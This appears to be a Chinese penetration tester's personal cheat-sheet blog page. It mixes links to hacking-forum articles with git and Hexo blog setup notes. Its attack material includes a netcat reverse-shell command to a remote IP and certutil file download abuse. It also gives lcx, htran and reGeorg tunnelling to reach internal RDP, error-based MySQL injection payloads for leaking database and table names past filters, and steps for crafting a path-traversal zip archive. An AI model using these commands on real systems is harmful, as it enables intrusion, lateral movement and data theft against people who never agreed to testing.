好文章收集

tips:记录一些记不住的套路

注册表 bypassUAC 加用户 https://www.t00ls.net/thread-43711-1-1.html #可以用在system权限无法添加用户的情况

cmd上传文件的N种方法 https://www.t00ls.net/articles-37253.html

1
certutil -urlcache -split -f https://www.baidu.com/img/bd_logo1.png D:\x.txt 自定义目录下载

乙方渗透测试之fuzz爆破 http://www.cnnetarmy.com/乙方渗透测试之fuzz爆破/
渗透测试岗位笔试题 https://www.t00ls.net/viewthread.php?tid=41627
URL跳转绕过 https://www.t00ls.net/thread-43001-1-1.html
Word漏洞 CVE-2017-11882 POC https://www.t00ls.net/viewthread.php?tid=42734
nmap用法:http://www.91ri.org/8516.html

php代码混淆解析站:https://www.unphp.net
office-vulnerability-cve-2017-11882 http://blog.hflsafe.cn/2017/11/22/office-vulnerability-cve-2017-11882/
域渗透前置知识http://twi1ight.com/2016/04/basics-of-active-directory-hacking/#more
利用 ew 轻松穿透目标多级内网
web全套资料 干货满满 各种文章详解

MSSQL不使用xp_cmdshell执行命令并获取回显的两种方法

突破防火墙和脚本限制建立代理隧道

git clone 地址
git add README.md
git commit -m “first commit”
git push -u origin master

git init
git remote add origin https://github.com/admintony/insert_update_injectionCode.git

删除指定文件:
git clone 地址
git rm -r –cached 文件名

git push -u origin master

nc使用:
    nc.exe -e cmd remoteIP Port
    nc.exe -vv -lp Port
lcx使用:
    lcx.exe -slave remoteIP RPort localIP Port
    lcx.exe listen RPort LPort
htran
正向代理
服务端 htran.exe -s -bind 8888
客户端 SocksCap:SOCKS Version 5 服务端IP:8888

反向代理
客户端 htran.exe -s -listen 1234 8888
服务端 htran.exe -s -connect 客户端IP 1234
客户端 SocksCap:SOCKS Version 5 127.0.0.1:8888

正向端口转发
服务端 htran.exe -p -tran 8888 127.0.0.1 3389
客户端 RDP 服务端IP:8888

反向端口转发
客户端 htran.exe -p -listen 1234 8888
服务端 htran.exe -p -slave 客户端IP 1234 127.0.0.1 3389
客户端 RDP 127.0.0.1:8888

python reGeorgSocksProxy.py -u http://targetURL/tunnel.nosocket.php -p 233

nmap的基础用法:
nmap -sP 10.10.4.0/24 -oS nmap.txt #扫描存活主机,并存放在namp.txt
nmap -sT 10.10.4.16 -v -oS nmap.txt #扫描某个ip的开放端口
namp -sT 10.10.4.0/24 -v -oS namp.txt #扫描网段的主机并且扫描存活主机的端口


iis6远程代码执行工具
iis6远程代码执行工具
shellshock利用工具
ViewStateDecoder2.0 ViewState解密
zfdumper 正方教务系统利用工具
抓取mstsc保存的密码


最详细的python+selenium教程


SQL注入中过滤了一些字符之后进行注入的方法:

1
2
3
4
5
6
7
8
9
10
 and Polygon(id) #爆表名
#~ error:Illegal non geometric '`库名`.`当前页面连接的表名`.`所填字段名`' value found during parsing
#这里的字段必须在这个表中存在 ,如注入点为?id=123则id存在几率较高。
1-a(); #爆库名
#~ error:FUNCTION 库名.a does not exist


版本5.6.x以上可以用下面的表代替information_schema,
select * from mysql.innodb_table_stats;
select table_name from mysql.innodb_table_stats where database_name

绕过IDS过滤information_schema继续注入


重装系统后恢复博客

1.安装Git Bash

  • 下载地址

  • 安装步骤:双击下载好的EXE文件,一路next就好

2.安装NodeJs

  • 下载地址 (说明:LTS为长期支持版,Current为最新版)

  • 安装步骤:下载好msi文件后,双击打开安装,也是一路next

3.安装hexo

  • 在博客目录下执行npm i -g hexo

4.搭桥GitHub

  • 配置gitbashgit config --global user.name "admintony"git config --global user.email "78941695@qq.com"

  • 创建公钥ssh-keygen -t rsa -C "78941695@qq.com" (注意:id_rsa默认目录,然后复制到blog目录下)

  • github添加公钥

  • 测试连接ssh -T git@github.com

5.搜索插件

  • 安装搜索插件:npm install hexo-generator-search --save && npm install hexo-generator-searchdb --save

6.安装字数统计插件

  • npm i --save hexo-wordcount

7.安装sitemap插件

  • npm install hexo-generator-sitemap --save-dev
  • npm install hexo-generator-baidu-sitemap --save-dev

8.安装置顶插件

  • npm uninstall hexo-generator-index --save

  • npm install hexo-generator-index-pin-top --save

9.自动推送

  • npm install hexo-baidu-url-submit --save

如何创建../../a.php的压缩包

创建一个名为aaaaaaindex.php的文件

之所以起这个名字,就是预留一些空间,方便我之后将文件名改成../../index.php,而不用怕字符串长度不对。

压缩为压缩文件并用notepad++打开

修改两处名称,并保存

把前面6个a替换成../../